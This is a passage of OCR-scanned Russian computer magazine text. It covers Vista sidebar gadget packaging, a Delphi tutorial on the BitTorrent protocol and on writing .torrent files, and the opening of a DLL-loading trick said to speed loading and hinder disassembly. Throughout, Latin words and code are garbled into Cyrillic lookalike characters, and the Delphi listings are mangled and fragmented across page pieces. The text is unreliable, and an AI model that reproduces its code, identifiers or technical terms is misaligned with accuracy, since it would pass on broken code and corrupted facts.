ЦехЪСІіскз . іппегТехС = " " ; 

ЦехСІшргеззіопз . іппегТехЦ = " " ; 
ЦехСЕагпіпдз . іппегТехІ: = ІоасІзЦабиз; 

} еізе { 

ЬехЦЕагпіпдз . іппегТехС = "Баланс: " + 
Ьаіапсе . ЦоЕіхесІ ( 2 ) ; 

ЦехЦСІіскз . іппегТехС = "Сііскз: " + сііскз; 
бехШшргеззіопз . іппегТехЦ = "Показы: " + 
шргеззіопз; 

} 



Настройка параметров гаджета 



сойіпд 




> ІП^О 

Всю самую подроб- 
ную информацию о 
гаджетах для Ѵізіа 
БісІеВагты найдешь в 
М50Ы, который, кста- 
ти говоря, потихоньку 
начали переводить на 
великий и могучий. 



Ѳ 



> СІѴСІ 

На диске тебя ждет 
готовый гаджет для 
мониторинга Ооодіе 
АсІЗепзе. Если лень 
писать самому — поль- 
зуйся на здоровье. И 
помни, что распаковав 
архив, ты получишь 
доступ к исходникам и 
сможешь усовершенс- 
твовать гаджет по 
своему усмотрению. 



Если ты планируешь нетолько сам пользоваться собранным 



своими руками гаджетом, но и поделиться им со своими дру- 
зьями, то неплохо было бы замутить инсталлятор. С инстал- 
лятором тоже все настолько просто, что даже скучно. Берешь 
свой любимый архиватор, поддерживающий 2ІР-формат(а 
какой, скажите, не поддерживает?) и запаковываешь каталоге 
гаджетом. После этого просто поменяй расширение с . гір на 
. даддеі. Все. Теперь по двойному щелчку на созданном фай- 
ле будет открываться стандартный диалогустановки нового 
гаджета. Всем радоваться. ЭИ 



Опасно ! 

Как уже упоминалось в статье, гаджеты имеют достаточно широ- 
кие возможности взаимодействия с операционной системой. Это 
предъявляет особые требования к безопасности гаджета, особен- 
но если он работает с сетевой средой. 

Одним из откровенно слабых мест в системе безопасности являет- 
ся механизм взаимодействия с АсгіѵеХ-компонентами. Коррект- 
ность и безопасность такого взаимодействия никак не контроли- 
руется операционной системой, и вся ответственность ложится на 
разработчика гаджета. 



Альтернативы 

НТМЬ + ІаѵаЗсгірі: — далеко не единственная технология создания 
гаджетов для ѴізГа ЗісІеЪаг. Возможно создание гаджетов на основе 
ѴѴРР и Зі1ѵег1і§Ьі. Хотя данные технологии более трудоемкие, они 
обеспечивают больше возможностей в плане функциональности и 
интеграции с операционной системой, а также предлагают более 
надежную схему обеспечения безопасности гаджета и пользователь- 
ских данных. 
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КОДИМ ПРАВИЛЬНЫМ ВІТТОККЕМТ-КЛИЕНТ 
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айлообменников типа гаріазпаге.сот? 



аІІ-і386.ізо 



Тебе не надоело сливать ( 



ично меня уже достали их ограничения. К счастью, есть хорошая альтерна- 



тива — ВіИогепі: трекеры. Сегодня мы попробуем поковырять этот протокол 



и написать свои продвинутый клиент. 



ГЛ 



3.7% 



)1.ізо 



г ТЕОРИЯ 




Как обычно, перед тем как ринуться в бой, тщательно продумаем страте- 
гию и разберемся стеорией. «ВіНогепІ» — протокол для сетей типа р2р и 
предназначен он для передачи большихфайлов по Сети. Первая версия 
протокола появилась в 2001 году. К настоящему времени ВіНогепІ: стал 
очень популярным, болеетого — он является стандартом быстрого распро- 
странения файлов. Популярным его сделали ряд особенностей: 

1 . Отсутствие очередей. Закачка файлов начинается сразу и без каких-либо 
ограничений, присущихтаким сетям какебопкеу. 

2. Нетребуется постоянное функционирование сервера —трекера. По сути, 
клиенту достаточно всего один раз подключиться к серверу, чтобы получить 
информацию о пирах (клиентах, которые занимаются непосредственно 
раздачей файлов). После чего можно спокойно скачивать файл. 

3. Закачка любого файла производится по частям. Тем самым, существенно 
увеличивается скорость закачки, ведь постоянное присутствие сида (обла- 
дателя всех частей файла) необязательно. В случае отсутствия сида будет 
происходить обмен частей между пирами. 

4. Скорость закачки ограничена только шириной канала раздающего. 
Соответственно, чем больше клиентов, которые раздают файл, тем быстрее 
ты сможешь его скачать. Это далеко не все плюсы протокола ВіИЪггепІ, но 
их должно хватить, чтобы забыть про ослов и прочие гарісі. 



^ ОБЩАЕМСЯ ПО ПОНЯТИЯМ 

Чтобы понять, о чем речь в статье, необходимо разобраться стерминами. 
Знать их должен любой пользователь ВііТоггепІ, а программист, решивший 
закодить клиент, — и подавно. Уверен, что ты и так их знаешь, но некоторая 
систематизация не помешает. Начнем с основ. Трекер (ігаскег) — сервер, 
на котором хранятся ІР-адреса участников раздачи, рейтингучастников и 



хэши файлов. Главная задача трекера — предоставить возможность кли- 
ентам найти друг друга. Пир (реег) — клиент, участвующий в раздаче. Как 
правило, пиру присуще два состояния — закачка и отдача уже скачанных 
частей файла. Сид (зеесі) — пир, который уже скачал весь файл полностью и 
располагает всеми его сегментами. Чтобы стать сидом, необязательно ска- 
чивать какой-либо файл, можно просто начать раздачу своего добра. Л ичер 

— он же пиявка (ІеесЫ — пир, у которого еще нет всех частей файла, но он 
продолжает за качку. В большинстве случаев, термин используется в нега- 
тивном смысле. Так называют клиентов, которые скачиваютбольше, чем 
отдают. Толпа/Рой (зѵѵагт) — все пиры, участвующие в раздаче. Рейтинг 
(збаге гаііо) — соотношение отданного и скачанного. Рейтинг необходим, 
в первую очередь, для пополнения контента. Работает по следующему 
принципу: скачивая файл, ты уменьшаешьсвой рейтинг, а отдавая файл 

— наоборот, увеличиваешь. Клиенте маленьким рейтингом рискует быть 
забаненным иу него меньше возможностей, чему клиента с более высоким 
(например, отсутствует одновременная закачка несколькихторрентов). 
Анонс (аппоипсе) — отправка информации на сервер. В качестве отправи- 
теля выступает клиент, а в качестве информации — соотношение скачан- 
ного и отданного. Получив эти данные, трекер передает клиенту ІР-адреса 
других клиентов. Анонс УР1_ (Аппоипсе 1)РІ_) — адрестрекера. Именно по 
этому адресу и происходит отправка информации. Торрент/торрент-файл 
(іоггепі) — файл метаданных, в котором содержится информация о прини- 
маемых/раздаваемых файлах, количестве сегментов и их хэшах. Подробнее 
о структуре этого файла мы поговорим позже. 

Щ КАК ВСЕ ЭТО РАБОТАЕТ? 

С основными понятиями разобрались, а значит, пора переходить к более 
детальному рассмотрению Віііогепі. Перед тем, как приступить кзакач- 
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Принцип работы протокола 
ВіГГоггепІ: 



ке/раздаче файлов, необходимо 
скачать соответствующий торрент- 
файл. Как правило, торренты добы- 
ваются из всевозможных форумов, 
вроде іоггепіз.ги или через специ- 
альные поисковые системы вроде 



Главное окно популярного клиента иТоггеп 



Разработка в самом разгаре 



рігаіеЬаѵ.огд . Скачавторрент-файл.ты должен скормить его торрент-кли- 
енту. Далее все просто: клиент соединяется стрекером (анонс игіхранится 
вторрент-файле), сообщает ему свой ІР и хэш необходимого файла; в ответ 
сервер отправляет адреса пиров/сидов, участвующих в раздаче. После 
этого необходимость в трекере на некоторое время исчезает. Ты качаешь и 
обмениваешься с другими пирами. Обмен с другими пирами выглядиттак: 
ты посылаешьзапрос на закачку сегмента нужного файла определенному 
пиру — если он не против и может поделиться этим кусочком, то начина- 
ется процесс закачки. Скачав сегмент, ты оповещаешь остальных пиров о 
наличии втвоем распоряжении нового кусочка (чтобы другие пиры знали, 
у кого его качать]. Затем все повторяется. Причем повторяется с шага, на 
котором тебе необходимо соединиться с сервером и получить информацию 
о других пирах. Закончив закачку всего файла, ты получаешь статус сида. 
На рисунке вверху приведена схема, демонстрирующая процесс работы по 
протоколу ВИТоггепб 



• аппоипсе ІІ5І — список, содержащий несколько аппоипсе ІІНІ_; 

• сгеаіе сіаіе — дата создания Іоггепі-файла в формате 1)піх-1іте; 

• соттепі — комментарий от создателя торрент-файла; 

• сгеаіесі Ьу — название и версия программы, в которой был создан Іоггепі- 
файл. 



В СТРУКТУРА ТОРРЕНТ-ФАЙЛА 

В файле метаданных (торрент-файле), как я уже и говорил, находится вся 
информация по файлу (или файлам), участвующему в раздаче. Без него 
по протоколу Війогепі: скачать ничего не удастся. В общем виде структуру 
файла метаданных можно разделить на три составляющие (таблица 1 ). 
Внутренности Іоггепі-файла — это Ьепсосііпд-данные. Формат файла 
позволяетхранить следующиетипы данных: байт-строки, числа, списки и 
директивы. 

На первый взгляд, перед нами — «каша» непонятных данных. Сразу возни- 
кает чувство, что все сложно и запутанно. На самом деле, сложного ничего 
нет. Давай попробуем рассмотреть примеры записи Ьепсосііпд-данных. 
Начнем с правил записи строк. В общем виде форматзаписи строковых 
данных выглядиттак: 

Строки: 

сдлина строки> : <строка> 

Пример: 5 : хакер. 

Числа: 

сключ іхчислохключ е> 

Пример: і31337е. 

СПИСКИ: 

сключ ІхЬепсойіпд данныехключ е> 

Пример: 15 :хакер5 : Іашеге. 

Директивы: 

сключ сіх строка ЪепсосЗіпдхэлемент ЬепсосЗіпдхключ е> 
Пример: <35 : сосіегб : зрісіеге (Сосіег => зрісЗег). 

В спецификации структуры файла метаданных есть несколько предопреде- 
ленных директив: 

• іггіо — директива для описания свойств файлов. В зависимости оттипа 
торрент-файла (обычный — один файл или смешанный — несколько 
файлов) эта директива применяется по-разному. В директиву входят: ріесе 
ІепдіЬ — длина сегмента файла; ріесез — хэш сумма сегмента, полученная 
по алгоритму 5НА1 . Разницу применения директивы для обычного и сме- 
шанного режимов смотри втаблице 2; 

• аппоипсе — анонс 1)ВІ_; 



Ш ПРАКТИКА 

Мы уже рассмотрели достаточнотеории. Самое время что-нибудь накодить. 
Ксожалению, рассмотреть написание всего ВіИогепІ-клиента в рамках 
одной статьи невозможно, поэтому сегодня мы напишем первую часть — 
редактор Іоггепі-файлов. Итак, к делу. 

Запускай йеІрЫ и создавай новый проект. Дизайн можешь подогнать под 
мой вариант(смотри рисунокна стр. 99]. 

По всей форме у меня растянут компонент ТРадеСопЬгоІ с двумя создан- 
ными закладками. На первой («Содержимое Іоггепі») расположен компо- 
нент ТЫзЬѴіеѵ/. В этом компоненте мы будем хранить название и размеры 
файлов, которые впоследствии будем добавлять в торрент. Ради удобства 
отображения я установил у ТЬізѣѵі еѵі свойство ѴіеыЗѣуІе в ѵзКерогі 
и создал три колонки: файл, размер, путь. На второй закладке я разместил 
восемь компонентов ТЕбіІ, один ТМегпо и одну копию ТРаііеТітеРіскег. 
В этих компонентах мы будем выводить различную информацию, выдер- 
нутую из Іоггепі-файла. Для комфортного отображения даты создания тор- 
рент-файла я воспользовался компонентом ТБаІеТітеРіскег. С ним мы 
избавимся отлишних преобразований полученной даты. Центр управления 
нашей программой будет находиться на панели инструментов. На ней я 
создал пять кнопок: 

• ОрепТоггепіВіп — кнопка для открытия Іоггепі-файла; 

• ЗаѵеТоггепіВіп — пимпа для создания нового торента; 

• МеѵѵВіп — служит для очистки все элементов формы; 

• АсІсіРіІеВіп — кнопка для добавления нового файла в ІюггепЦ 

• ОеІРіІеВІп — кнопка для удаления файла изторрента. 

На этом сдизайном формы пора заканчивать и переходить ксамому захва- 
тывающему и увлекательному процессу — кодингу. Сегодня я покажу, как 
можно читать и создавать торрент-файлы. Переходи в редактор кода и сразу 
объяви новую структуру: 



буре 

ТРіесез = гесогсі 
_Ьаз1і : збгіпд; 
_Ьаз1іВіп: збгіпд; 
епсі; 



иріоасі Гс 




В данной структуре (или записи) мы будем хранить информацию по каждому 
сегменту файла. В _казЪ. будем записывать 20-байтную хэш-сумму, рассчи- 
танную по алгоритму 5НА1 , а в_1іаз1іВіп — бинарный вариант этого же 
значения. 

В разделе «ргіѵаіе» нашей формы объяви процедуру СгеакеТоггепі (Лз: 
ТРіІеЗѣгеат; тиІІіНіІе-.ВооІеап) . Этим методом мы будем создавать 
новый торрент-файл. В качестве параметров в процедуру будут передаваться 
іъ — переменная типа ТРІІеЗЬгеат (файловый поток для создания торрент- 
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файла) и булевское значение (тиііііііе), определяющее тип будущего тор ре нт- 
файла (обычный или смешанный). Нажимай <сІгІ+5ЫЙ+с> и ОеІрЬі создаст 
заготовку процедуры. Перепиши в нее код из соответствующей врезки. 
Перебивая листинг, не забывай возвращаться ктексту статьи и читать мои 
комментарии (лично я предпочитаю вообще целиком переписы- 
вать чужой код по-своему, иначе я его так до конца и не могу 
понять — Прим. ред.). Первым делом посмотри на самое начало процеду- 
ры. Вместо привычных ключевых слов ѴАВ/Ведіп у меня идетобъявление 
нескольких локальных процедур. Использованиетакого подхода несколько 
ухудшает читабельность кода, но иногда это может быть удобно. Наш случай 
таковым и является. Давай взглянем на каждую процедуру в отдельности. 
Ргосесіиге МгНеВиИИ (ЪиЕб : зѣгіпд) записывает в файловый поток 
первый символ из переданной в качестве параметра строки-переменной 
ЬиРР. Бел и ты внимательно читал теорию, то уже должен был дога- 
даться, что использовать эту процедуру мы будем для записи «ключей» 
Ьепсосііпд-данных. Процедуры МгіѣеЗІг ( ) и! ѴгіѣеІШ ( ) имеют 
аналогичное предназначение и будут использоваться для записи строк 
[МгіІеЗСгО ) и чисел Ыгі СеХлС ()). 

Разобравшись с локальными процедурами, можно двигаться дальше. 
Впереди будет много интересного. Сейчас на секундочку отвлекись от 
текста и посмотри на таблицу 1 , в которой я определил уровни структуры 
Іоггепі-файла. Первым уровнем идет«Заголовок», а значит, самым пер- 
вым шагом в нашей процедуре будетформирование заголовка будущего 
торрент-файла. Формирование заголовка я начинаю с записи ключа — б, 
а затем по очереди записываю имена элементов (такназываемые дирек- 
тивы) и их значения, которые мы будем вводить в компонентах ТЕбіІ, 
расположенных на второй закладке. Запись элементов однообразна и я 
думаю, все должно быть понятным. Хотя нет, процесс записи времени со- 
здания стоит рассмотреть подробней. Как я уже говорил в теоретической 
части, время создания торрент-файла должно храниться в формате ІІпіх- 
Ііте. К сожалению, в ОеІрЬі среди стандартных функций неттой, которая 
могла бы конвертировать время в ІІпіх-ііте и обратно. Следовательно, 
подобную функцию придется писать самому. А может и не придется, ведь 
во всемирной паутинке легко найти примеры кода, реализующего кон- 
вертирование. Вариантов много, но мне больше всех нравится этот: 

ТипсСіоп ТГогшІ .Ѵ^іпТішеТоІІпіхТіше 

(міпТіте: ТБаСеТіте) : ІпДедег; 

ѵаг 

РіІеТіте: ТРіІеТіте; 

ЗузДетТіше : ТЗу зСешТіше ; 



Таблица 2. Особенности использования директивы іпіо 



Обычный (5ін6і_е 
еіьемоое). Список 
значений 


Смешанный [Мшлт риемсше]. 
Список значений 




МАМЕ — ИМЯ ФАЙЛА 


ЫАМЕ — ИМЯ ТОРРЕНТ-ФАЙЛА 


ЬЕМСТН — РАЗМЕР 
ФАЙЛА 


РИ.Е5 — СПИСОК ФАЙЛОВ. В ДИРЕКТИВЕ МОЖЕТ 
ИСПОЛЬЗОВАТЬСЯ НЕСКОЛЬКО ПОДДИРЕКТИВ: ЬЕИОТН 

(размер файла), мо5зим (хеш), ратн (путь кфайлу). 


мо5$іж — ХЭШ СУММА 
ФАЙЛА, ПОЛУЧЕННАЯ ПО 
АЛГОРИТМУ МР5 





Таблица 1 . Структура Іоггепі-файла 



Название уровня 


Описание 


1. Заголовок 


В ЗАГОЛОВКЕ СОДЕРЖИТСЯ АНОНС 11 ВБ, ДАТА СОЗДА- 
НИЯ Т0РРЕИТ-ФАЙЛА, КОДИРОВКА ФАЙЛА, НАЗВАНИЕ 
ПРОГРАММЫ В КОТОРОЙ БЫЛ ПОСТРОЕН ФАЙЛ, КОММЕН- 
ТАРИИ СОЗДАТЕЛЯ И Т.Д. 


2. Информация 


В ЭТОМ БЛОКЕ СОДЕРЖАТСЯ ВСЕ НАЗВАНИЯ И РАЗМЕРЫ 


0 ФАЙЛАХ 


ФАЙЛОВ, КОТОРЫЕ МОЖНО ПОЛУЧИТЬ С ПОМОЩЬЮ 




ДАННОГО ТОРРЕНТ-ФАЙЛА. 


3. Сведения 


В БЛОКЕ УКАЗАНО КОЛИЧЕСТВО СЕГМЕНТОВ И ИХ 5НА1 - 


0 СЕГМЕНТАХ 


ХЭШ СУММЫ. 



I: ІпДедег; 

Ьедіп 

ВаДеТішеТоЗузСешТіше (МіпТіте , ЗузДетТіте) ; 



Создание 

іоггепі-сЬайла 



ргосесіиге ТРогтІ.СгеаіеТоггепі: 
(ТзіТРіІеЗтгеат; 
тиМШе:Ъоо1еап) ; 

ргосесіиге ѴѴгкеВиЩЪиІТ: 5ітіп§) ; 

Ье§іп 

^.ѴѴгіІеВиІТег (ЪиЩ 1] , 

1еп§гіі(ЪиЯ)); 

епсі; 

ргосесіиге ѴѴгйеЗгг (з : зігіпд) ; 
Ье^іп 
ѴѴгйеВиЩ 

ІШТо8іг(1еп2гіі(8)) +':'+з); 

епсі; 

ргосесіиге ѴѴгііеІп* (іпсіп*64); 

Ье^іп 

ѴѴгітеВиЩТ); 

ѴѴгйеВиІТ (ІпГТоЗГг (іпі:) ) ; 
ѴѴгісеВиЩ'е'); 

епсі; 

ѴАК 

і:іпі:е§ег; 

_ріесеЬеп§і;1і : ІпСе^ег; 

ВЕСИМ 

ѴѴгйеВиЩ'сГ); 
ѴѴгіГе5і:г('аппоипсе') ; 

ѴѴгіГеЗиг (АппоипсеШШсИг.ТехО ; 
II (СоттепСзМето.ТехС < > ") 

ТЬеп 

Ье§іп 

№і1е8<тСсоттеп1; , ) ; 

ѴѴпіеЗіт( 

СоттепСзМето.ТехО ; 

епсі; 

Іі : (Рго§№теЕс1іі:.Техі: < > ") 

ТЬеп 

Ъе^іп 

ѴѴгіІеЗіг Ссгеаіесі Ьу') ; 
ѴѴгі1:е8іт(Рго§КатеЕ(1к.Тех0 ; 

епсі; 

ѴѴгіГеЗггСсгеаПоп сІаГе') ; 
ѴѴгіІеІпІ; (ѴѴіпТітеТоИпіхТіте ( 
ВаСеСгеаСе.ВаСеТипе)) ; 

ІГ (ЕпсосИп^ЕсИс.ТехИ < > ") ТЬеп 

Ъе^іп 

\V^і1;е81тСепсос1іп§ , ) ; 

ѴѴгіСеЗіт (Епсодт^ЕсИпТехО ; 

епсі; 

\Ѵг ііе 8 Иг ( ’іпРо ; 



ѴѴгігеВиЩ'сГ); 

Іі' (МиШРіІе) ТЬеп 
Ъе§іп 

ѴѴгііеЗггСШез'); 

ѴѴгііеВиЩТ); 

Рог і: =0 Но 

ЬізГѴіеѵѵІЛГетз.СоипМ Эо 
тѵііЬ ІізСѴіеуѵІ .ІСетз.ІІ:ет[і] 

Ло 

Ье§іп 

ѴѴгПеВиЩ'Л'); 

\ѴгіНе 8Нг (’Іеп^НІі') ; 

ѴѴгіНеІпН ( 8НгТоІпН ( 
ЗиЫсетз.Зсгіп^з [0] )) ; 
ѴѴгііеЗо-СраіІТ); 
ѴѴгісеВиЩТ); 

ѴѴгйеЗгг (ЕхігасіРіІеКате ( 
ЗиЫіетз . 8ггіп§5 [ 1 ] ) ) ; 
ѴѴгйеВиЩ'е'); 

ѴѴгйеВиЩ'е'); 

епсі; 

ѴѴгіГеВиЩ'е'); 

епсі 

еізе 

Ье^іп 

ѴѴгіГеЗіг (1еп§1:1Т) ; 

ѴѴг інеіпн С 8НгТоІпі; С 
ІІ8і:Ѵіеѵѵ1Лі:ет8Лі:ет[0] . 
ЗиЫгетз. Зі:гіп§5 [0] )) ; 

епсі; 

ѴѴгіГеЗіг ('пате') ; 

ѴѴгіГеЗГг (МатеЕсИпТехО ; 

_ріесеЬеп§ГІі : = 65536; 
ѴѴгііеЗітСріесе 1еп§гЬ') ; 
ѴѴгііеІпіС-ріесеБеп^гіі) ; 

ѴѴгііе Згг (‘ріесез’) ; 

СеіРіесез (_ріесеЬеп§і;1і) ; 
ѴѴгііеВиІТ (ІпгТоЗіг ( ( 
Ы§Ь(ріесез) + 1) *20)); 
ѴѴгіСеВиЩ':'); 

Рог і: =0 Но Ні^ЬСріесез) Эо 
ѴѴгіГеВиЩріесез [і] ._Ьаз1іВіп) ; 

ѴѴгіГеВиЩ'е') ; 

ѴѴгйеВиЩ'е'); 

Рз.Ргее; 

ЗІіо\ѵМе55а§е( 

Тоггепі: файл создан ! ') ; 

ЕШ; 



► 098 
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ЗузбетТітеТоРіІеТіте (ЗузбетТіте , РіІеТіте) ; 

I := Іпіедег (РіІеТіте . сіѵ/НідЫЭабеТіте) зЫ 32 
+ РіІеТіте . (іѵ^Ьоѵ/БаЦеТіте; 

Кезиіі := (1 - 116444736000000000) йіѵ 
Іпі64(10000000) ; 

епсі; 

Код функции, выполняющей обратную трансформацию 
времени, смотри в исходнике, который дожидается тебя на 
нашем ОѴй. После записи в файл основных директив начи- 
нается процесс описания файлов (запись директивы іпРо). 
Тутмы встаем перед выбором: если создаемторрентстипом 
«смешанный» (лші ііРіІе), то нам необходимо запустить 
цикл и пробежаться по всему списку выбранныхфайлов и за- 
писать в Іоггепі размеры/пути для каждого файла. В качестве 
путей (директива раЦі) указывается не тот путь, по которому 
хранится файл на диске, а тот, который определяет местопо- 
ложение файла относительно торрента. Например, формат 
файла метаданных (торрент) позволяет добавлять как файлы, 
таки директории. Предположим, что пользователь выбрал 
один файл и одну директорию с несколькими файлами. Сразу 
возникает вопрос: а какзаписать файлы, которые находятся в 
директории? В таких случаях и приходится использовать ди- 
рективу раЛъ В своем примере я не реализовал возможность 
добавки отдельной директории, но в реальном приложении 
ты обязательно должен учесть этот нюанс. Если мы создаем 
торрент, в котором будет о пределен лишь один файл (такие 
торрент-файлы еще называют классическими), то все, что от 
нас требуется — записать размер файла (указывается с помо- 
щью директивы ІепдіМ и само имя файла. Записав в Іоггепі: 
необходимую информацию о файлах, которые мы собираемся 
раздавать, обязательно нужно разбить все файлы на сегменты 
определенного размера и посчитать их хэш-суммы. В своем 
примере размер сегмента я задал жестко — в коде. Он у меня 
равен 65536 байтам или 64 килобайтам. Если ты будешь писать 
полноценную программу для создания торрент-файлов, то 
должен предоставлять пользователю самостоятельное право 
выбора размера сегмента, так как этот размер задается не от 
балды (каку меня в примере), а относительно общего размера 
файлов, для которых мы создаем торрент. Для разбиения 
файла по сегментам и получения хэшей я создал еще одну 
процедуру — 6еіРіесез(]. Ее содержимоеты можешьувидеть 
на диске. После выполнения данной процедуры массив ріесев 
заполнится элементами типа ТРіесез, содержащими посчи- 
танные хэш-суммы сегментов файлов. 

Процедура ОеІРіесез () принимает всего один параметр 
— размер сегмента файла. После получения информации 
о размере сегмента в процедуре запускается цикл, в ходе 
которого перебираются все файлы из ТЬізІѴіемм для 
каждого из них вычисляется 5НА1 -хэш. Полученные данные 
записываются в динамический массив_ріесезтипа ТРіесез 
(структура, которую мы определили в самом начале). Для 
вычисления хэш-суммы я воспользовался объектом ТЗІіаІ из 
модуля МеззадеОідезІ: от йаѵе БЬаріго. Работать с алгорит- 
мами ЗНА1.М65 (и другими) с помощью этого модуля одно 
удовольствие. Все, что требуется для получения хеша — вос- 
пользоваться методом ТгапзРогтп ( ) , после чего в свойствах 
ЪазііѴаІие и ЬазЬѴаІиеВуІез появится рассчитанная 
хэш-сумма. Больше в процедуре ничего интересного нет, 
поэтому перейдем сразу кзавершающему шагу — наполним 
кнопку За ѵеТог г еп ѢВІ п жизнью. Создай для нее обработчик 
события ОпСІіск и напиши в нем: 



ѵаг 

_ЫемРі1е : ТРіІеЗбгеат; 



Ьедіп 

Іі (ЗаѵеБіаІодІ .Ехесиіе) ТЪеп 
Ьедіп 

_ЫемРі1е := ТРіІеЗбгеат. Сгеабе 

(ЗаѵеБіаІодІ .Рі1еКате+ ' . іоггепі' , 
ітСгеаіе) ; 

іі (ЬізбѴіемІ . Ібетз . Соипі = 1) ТЬеп 
СгеаЬеТоггепЬ (_ЫеѵіРі1е , іаізе) 

еізе 

СгеабеТоггепД (_ЫеѵіРі1е , ігие) ; 

епсі; 

епсі 

В этом коде я инициализирую переменную типа файловый 
поток. Вызывая метод «Сгеаіе», я передаю два параметра: 

1 — имя файла (файл стаким именем мы будем создавать); 

2 — режим доступа к файлу. Поскольку нам нужно создать 
новый файл, то указываем {тСгеаІе. 

^ ТЕСТИРОВАНИЕ 

На сегодня скучный урок программирования можно считать 
оконченным, а значит, нужно протестировать нашетворе- 
ние. Скомпилируй и запусти наш пример. Попробуй запол- 
нить все ТЕсШ:, добавить файлы в ЬізІѴіеы и сохранить 
собранный проект в виде торрента. Если у тебя все прошло 
без ошибок, то не спеши радоваться, так как основное тес- 
тирование только начинается. Скачай какой-нибудь іоггепі 
клиент (например, иТоггеп!:) и попробуй открыть им получив- 
шийся утебя файл. Если все тип-топ, то иТоггеп! пропарсит 
подсунутый емуфайлики предложит начать закачку. Но если 
иТоггеп! ругнется и сообщит ошибку, то значит, ты где-то 
накосячил и придется провести немало времени в играх с 
отладчиком. Код чтения торрент-файла я приводить не стал 
— статья не резиновая. Зато на диске, ты найдешь полный 
работоспособный исходник. В чтении файла нет ничего 
сложного. Разужты смог разобраться с созданием торрент- 
файла, то с чтением проблем возникнуть не должно. 




> ІП^О 

Любой хакер должен 
представлять себе 
кодерские принципы 
функционирования 
р2р. Но лишь самые 
злобные из них впос- 
ледствии пишутр2р 
ѵѵоггтіов :) 




Весь необходимый 
стафф для статьи ты 
сможешь найти на 
нашем диске 



^ ЗАКЛЮЧЕНИЕ 

Уже не первый раз убеждаешься в том, что все нервные 
крики в сторону ОеІрЫ — это просто бред и комплексы 
фанатов С++ [данная фраза проверена этическим 
комитетом; выдана справка о том, что провокаци- 
онной она не является , будучи написанной автором 
в состоянии аффекта — Прим. ред). На йеІрЫ можно на- 
писать практически любую программу, будьто компактная 
хакерская тулза или продвинутая программа для работы с 
БД. Мне остается только попрощаться с тобой и пожелать 
удачи в кодинге. Все свои вопросы ты можешь задать мне 
по мылу — буду рад пообщаться. До встречи! ИИ 




(ОЗІ_/саЬ 



іііо: 0%, 



3.7% 



? 



иріоасі г; 



□ 
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КРИС КАСПЕРСКИ 



Очередная порция трюков — загрузка сШ. с турбо наддувом — прямого отношения кС не 
имеет. Однако работает (не без изменений, конечно] как под ѵѵіпсіоѵѵз, так и І_іпих/В50, 
ускоряя загрузку динамических библиотек в десятки и даже тысячи раз. Дополнительный 
бонус — затрудняет дизассемблирование программы и препятствует снятию дампа! 



Генерация таблицы вызовов на стадии компиляции| 



| Загрузка динамических библиотекзанимаетзначительное время, 
но при большом количестве импортируемых функций. И хотя МісгозоТС 
предлагает кучу продвинутыхтипов импорта (ЬоипсІ ітрогі, беіау ітроіі], 
положение они не исправляют, а при динамическом импорте, когда опре- 
деление адресов функций определяется посредством СеІРгосАсЗсЗгезз 
(один вызов на каждую функцию), производительность вообще падает ниже 
плинтуса. В Ыпих/ВЗО ситуация обстоит не столь плачевно, но все равно 
издержки на загрузку динамических библиотек весьма значительны. Поэтому 
оптимизацией приходится заниматься самостоятельно. 

Идея состоит в переносе вызовов СеѣРгосАсЗдгезз из реал-тайма на стадию 
компиляции программы, при которой время их выполнения уже нетаксущес- 
твенно (в самом деле, какая разница сколько собирается программа — 60 или 
90 минут, главное, чтобы она работала, как фотонный звездолет). 
Последовательность действий при этом такова (разумеется, приводится лишь 
общая схема без углубления в детали): 

• компилируем ОІ_І_какобычно; 

• пишем вспомогательную утилиту, загружающую ОІ_І_ вызовом й = 
ЬоасЗЫЬгагу ( " с311_пате . (311 ") для определения ее базового адреса, 
зная который нетрудно вычислить РѴА-адреса всех экспортируемых функций: 
РѴА_Рп = (РМОРЮ) СеІРгосА(3<Згезз ( "Рп ") - (ОѴЮРВ) Ь. Остается толь- 
ко сгенерировать заголовочный .Ь файл, поместивтуда прототипы функций: 
ІуресЗеР іпѣ (*$Рп) (іпЬ) ; $Рп Рп; вместе с процедурой их инициа- 



01 



особен 



лизации: іпііі_пате_(311 (НАЫБЬЕ Ъ.) {Рп = ($Рп) ( (ПМОКО) Рп + 
(РМ(ЖО)Ъ ) ; } . Конечно, без хака тут не обошлось и наглое преобразование 
указателей вШШОпри переносе на другие платформы ни кчему хорошему не 
приведет. Поэтому в коммерческих продуктах придется чуть-чуть усовершен- 
ствовать наш генератор, подставляя вместо шоію целочисленный тип с 
размером, равным размеру указателя на функцию. Это делается либо вручную 
сучетом разрядности конкретной платформы (например, х86-64), либо цепоч- 
кой #іР/#е1зе в препроцессоре, но это уже детали; 

• подключаем сгенерированный заголовочный файл кбазовой программе, 
загружаем динамическую библиотеку черезъ = ЬоадЫЪгагу ( " 6.1 1_ 
пате. 6.11 ") и передаем полученный базовый адрес процедуре инициации 
1піЬ_(311_пате (Ъ.) ; 

• экспортируемые функции вызываем как обычно, например, а=Рп (Ь) ; (за- 
конченный пример реализации можно найти на диске в файлах ѣгіск-01-*, 
собранных в архив \гіскз-191і. 7г). 

За счет чего достигается преимущество в скорости? На первый взгляд, проце- 
дура инициации должна «съесть» весь выигрыш. Но функция ѲеіРгосАсІсІгезз 
выполняется намного медленнее, чем сложение двух переменных 
( (БМСЖО) Рп + (БИОКР)Іі) в процедуре инициализации загружаемой дина- 
мической библиотеки. То же самое относится и к статической компоновке, при 
которой для каждой импортируемой функции осуществляется «полнотексто- 
вой» поиск в таблице экспорта. 

Накладных расходов на вызов функции у нас нет, и они вызываются также, 



> 100 
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каки функции, импортируемые обычным образом [САЬЬ ИЗ: [Еипс_пате]). 
Если с обычным импортом любой дизассемблер справляется на ура, то в 
нашем случае 1ипс_пате представляет РѴА адрес, совершенно ничего не 
говорящий ни дизассемблеру, ни хакеру. Чтобы определить, что именно за 
функция вызывается, необходимо прогнать программу под отладчиком или 
снять с нее дамп (а помешать отладчику намного проще, чем дизассемблеру!). 

ЮА Рго не смогла распознать «хитрый» 
импорт АРІ-функции МеззадеВохА 



0401034 


ризіт 


0 


0401036 


ризіт 


оЕЕзеО аНе11о_1 


040103В 


ризЪ 


оЕЕзеО аНе11о_0 


0401040 


ризіт 


0 


0401042 


саіі 


оЕЕ_405030 



МеззадеВохА 

0405030 оЕб_40503 0 сМ ЗБ81І1 

; <- ничего не говорящий КѴА- адрес 



Единственный недостаток предложенного метода втом, что при изменении 
динамической библиотеки целевое приложение придется перекомпилиро- 
вать заново, что не есть гуд. А что мы, собственно, можем сделать? 



I 



к Универсальный загрузчик динамических библиотек 



Для чужих библиотек мы, действительно, ничего не можем сделать 
